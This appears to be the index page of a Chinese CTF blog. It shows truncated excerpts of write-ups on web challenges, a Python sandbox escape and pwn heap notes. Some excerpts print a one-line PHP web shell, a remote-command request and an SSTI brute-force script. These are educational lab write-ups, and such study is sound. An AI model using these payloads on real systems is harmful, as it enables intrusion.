golden的部落阁

# Web # [LitCTF 2025]easy_file ​ 登录框弱密码爆破为 admin:password，之后跳转到文件上传点，只能上传头像，并且 php 被过滤，短标签绕过： 1<?= system($_REQUEST['cmd']);?> ​ js 里面存在提示，说 file 查看头像，估计是可以文件包含。直接传： 1/admin.php?file=uploads/a.jpg&cmd=tac f* ​ 进行 rce。 # [LitCTF 2025]nest_js ​ 登录框弱密码爆破还是...

# BUUOJ-[NPUCTF2020]ezinclude 1 # 涉及的知识点 文件上传时的临时文件 php7 文件上传时 Segment Fault ，上传的临时文件不会被删除 绕过 disable_functions # 解题过程 ​ 扫个目录，存在 index.php 、 dir.php 、 404.html ​ 404.html 没啥用，先看 dir.php ，好像获取目录内文件的，但是不知道是什么地方的，之后看看。 ​ index.php 抓个包： 123456789101112131415HTTP/1.1 200 OKServer: openrestyDate: Mon,...

# Python 栈帧逃逸： # 1、yield 语与生成器函数： ​ python 中的 yield 语句用于定义生成器函数，它能让函数在运行过程中暂停并保存当前状态，后续再恢复执行。 ​ 生成器 是 Pythonn 中一种特殊的迭代器，它可以在迭代过程中动态生成值，而不需要一次性将所有值存 0 储在内存中。 ​ 举个生成器的例子： 1234567891011121314151617181920212223242526272829def func(): print("生成器函数第一次执行") yield 1...

# web361： ​ name 传参，直接干： 123456789101112131415161718192021from requests import getdef get_wrap(): for i in range(100,200): url = "http://a96b5242-08d2-4901-8692-4b324f00d95a.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()[" +...

# 从 NSSCTF 开始的复建之路 # 前言： ​ 摆烂了有段时间了，感觉不应该再继续这样了，开个新坑，让我慢慢回忆一些忘记的内容，我知道不应该摆烂，但心理问题导致我感觉一切都失去了意义，还好，maimai 让我至少有活下去的想法，在写这段话的时候，我正在听 The Last Page – ARForest，一切的不如意都有最后一页，而现在，我希望我的低谷期已经来到了 The Last Page ，期待接下来的每一步都会像 The Last Page 一般，充满希望，充满美好。 -- 发癫完毕 # Re： # [SWPUCTF 2022 新生赛] base64 ​ IDA...

WP： Web： Are you happy?： baby_unserialize： baby_sql： 非预期： 预期解 你一个人专属的进货网站： ezweb ezjava： Misc： 简单的压缩包： Pwn sign in find eggy： Arcaea_Sorting： Arcaea_Sorting_Revenge： Re： babyre： Crypto： 迷茫的艾米莉 seven more 翻一翻： 不合格的魔药： 情书与破碎的证书 题目描述记录： Web： Are u...

竞争包含先不写了，有时间再写。 # Web78 123456if(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);} ​ 常规文件包含，直接读 flag.php，filter...

# pwn 学习笔记（12）–Chunk Extend and Overlapping ​ chunk extend 是堆漏洞的一种常见利用手法，通过 extend 可以实现 chunk overlapping（块重叠） 的效果。这种利用方法需要以下的时机和条件： 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 # 1、对 inuse 的 fastbin 进行 extend： 12345678910111213 int main(void){ void *ptr,*ptr1; ptr=malloc(0x10);//分配第一个0x10的chunk...

# pwn 学习笔记（11）–off_by_one ​ 在处理 for 循环或者 while 循环的时候，有的可能会遇到如下情况： 123456789101112#include<stdio.h>int main(){ char buf[0x10]; for (int i = 0 ; i <= 0x10 ; i ++){ buf[i] = getchar(); } puts(buf); } ​ 多次输入几个 a 之后，发现了最后输出的时候输出了 17 个...

# Pwn 学习笔记（10）–UAF： ​ UAF 就是 Use-After-Free，即一个指向堆块的指针被释放后指针没有置零，形成了悬空指针，使得堆可以再次被使用。 ​ 由于我环境似乎运行不了某个程序，所以演示就不做了，上个简单题来看看。 ​ 题目是一个标准的菜单题，有创建 note 和输出删除的功能，别的不看了，直接看那三个函数： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546unsigned int add_note(){ int v0; //...